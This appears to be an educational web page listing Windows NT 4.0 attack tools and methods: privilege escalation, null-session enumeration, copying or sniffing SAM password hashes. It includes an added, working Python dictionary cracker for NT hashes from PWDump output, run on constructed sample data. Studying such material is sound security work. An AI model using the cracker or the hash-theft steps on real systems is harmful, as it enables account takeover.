NT Exploits
- GetAdmin - local privilege escalation on NT 4.0: adds an ordinary user account to the Administrators group (fixed by a Microsoft hotfix)
- CheckAdmin - lists who is a member of the Administrators group on the machines in your LAN
- Red Button - connects to the target over the NetBIOS ports (137, 138 and 139) with an anonymous "null session", i.e. without valid credentials, and enumerates information such as the real Administrator account name and the shares
- Winfo - over the same kind of null session, remotely retrieves a list of user accounts, workstation trust accounts, interdomain trust accounts, server trust accounts, and shares
- Password cracking tools
  - L0phtcrack - cracks LM and NT hashes taken from a SAM dump or from sniffed network logons; the free version does dictionary attacks only, brute force requires the paid version
  - NTSweep - free; guesses passwords over the network by attempting to change each account's password to the guess, which only succeeds if the guess matches the current password
  - NTCrack - password cracker for NT hashes
  - PWDump - dumps the LM and NT password hashes out of the SAM on a machine where you already have Administrator rights
  - Advanced NT Security Explorer - another LM/NT hash cracker
- Obtaining the password hashes
  - Sniffing the logon exchange off the network with a protocol analyzer such as Ethereal (free); the captured LM/NTLM challenge-response can then be cracked
  - Booting the machine into another OS (e.g. Linux or DOS) and copying the SAM file with NTFSDOS or LINNT, which bypasses NTFS permissions
  - Using LINNT to reset the Administrator password offline and obtain administrator access (only works on a pre-SP3 system WITHOUT SYSKEY enabled)
  - Obtaining the backup copy of the SAM (sam._) from c:\winnt\repair or from a backup directory
  - Obtaining a copy from a tape backup or an Emergency Repair Disk
- Port scanning - NetBrute Scanner; also scans for open shares
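The hash-dump-then-crack procedure above (PWDump output fed to a dictionary cracker such as L0phtcrack), as an added example that is not code from this page or from those tools. It computes the NT hash (MD4 over the UTF-16LE password) in pure Python, parses PWDump's user:rid:lmhash:nthash::: format and runs a wordlist against every NT hash in the dump. The account names, dump lines and wordlist are constructed for the example; the LM and NT hashes for "password" are the standard values. Computing LM hashes needs DES and is not included here; the example only flags accounts that still have one stored.

```python
"""Dictionary attack on NT password hashes from a PWDump-format dump.

Added example (not the page's code, not L0phtcrack/PWDump code).
"""
import struct

MASK = 0xFFFFFFFF
# LM hash of the empty password; PWDump writes this when no LM hash is stored
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (hashlib's md4 is often missing on OpenSSL 3)."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                            # round 1: words in order
            a = _rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 2: 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 3: 0,8,4,12,2,10,...
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            a = _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash: MD4 of the password encoded as UTF-16LE, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str):
    """Yield (user, rid, lmhash, nthash) from PWDump lines user:rid:lm:nt:::."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, rid, lm, nt = line.split(":")[:4]
        yield user, int(rid), lm.lower(), nt.lower()


def crack(dump: str, wordlist) -> dict:
    """Return {user: password} for every account whose NT hash is in the wordlist."""
    # NT hashes are unsalted, so hash the wordlist once and look every account
    # up in the table: one pass covers all accounts in the dump.
    table = {nt_hash(w): w for w in wordlist}
    return {user: table[nt] for user, _rid, _lm, nt in parse_pwdump(dump) if nt in table}


def accounts_with_lm_hash(dump: str) -> list:
    """Accounts that still store an LM hash (case-folded, two 7-char halves: far weaker)."""
    return [user for user, _rid, lm, _nt in parse_pwdump(dump) if lm != EMPTY_LM]


# Constructed PWDump-style output. The Administrator line carries the standard
# LM and NT hashes of "password"; Guest has the empty password; the third NT
# hash is derived here for a password the wordlist does not contain.
SAMPLE_DUMP = f"""\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:{EMPTY_LM}:31d6cfe0d16ae931b73c59d7e0c089c0:::
bsmith:1001:{EMPTY_LM}:{nt_hash('Tr0ub4dor&3')}:::
"""
WORDLIST = ["password", "", "letmein", "secret", "admin"]   # constructed wordlist

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_DUMP, WORDLIST).items():
        print(f"{user}: {pw!r}")
    print("accounts with an LM hash stored:", accounts_with_lm_hash(SAMPLE_DUMP))
```

Because the NT hash has no salt, the cost of a dictionary run is one hash per word regardless of how many accounts the dump contains, which is why a leaked SAM is so cheap to attack; the LM check is worth keeping because an account with an LM hash can be recovered in two independent 7-character, case-insensitive halves, far faster than the NT hash.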
Please mail any comments about this page to wsummers@cs.nmhu.edu